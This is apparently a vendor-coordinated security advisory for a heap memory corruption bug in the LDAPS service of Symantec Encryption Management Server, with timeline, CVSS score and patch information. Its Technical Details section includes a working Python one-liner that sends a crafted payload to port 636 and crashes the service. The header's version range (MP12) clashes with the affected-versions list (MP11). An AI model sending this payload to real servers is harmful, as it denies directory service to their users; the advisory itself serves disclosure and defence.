Note: LDAPS Service Heap Memory Corruption vulnerability in SEMS <= 3.3.2 MP12 allowing for reads to from or writes to a memory location outside the buffer’s intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.

Summary

The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer’s intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.

Affected Versions

  • Symantec Encryption Management Server <= 3.3.2 MP11

CVSSv3 Score

7.5 (High) CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Technical Details

A repeatable crash was discovered in the LDAPS service running on the appliance. Reproduced with a single Python command:

1

$ python -c "import socket;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.240.28.199',636));s.send('803a01030100030000002e00000040404141414142424242434343434444313145454545464646464747474731314848494949494a4a4a4a4b4b4b4b'.decode('hex'))"

This triggers a SIGSEGV signal, causing the service to exit. Both LDAP and LDAPS become unavailable until the service automatically restarts — making this a reliable denial of service against the directory service at minimum, and worth further investigation for exploitation potential.

Timeline

DateEvent
2015-07-06Vulnerability discovered
2015-07-30Vendor contacted
2015-08-02Vendor confirms issue
2016-02-19Patch released (v3.3.2 MP12)
2016-06-07Public disclosure

Remediation

Symantec product engineers have addressed these issues in Symantec Encryption Management Server 3.3.2 MP12. Customers should update to SEMS 3.3.2 MP12 as soon as possible to address these issues.

Credit

Discovered and reported by Toby Reynolds following responsible disclosure guidelines.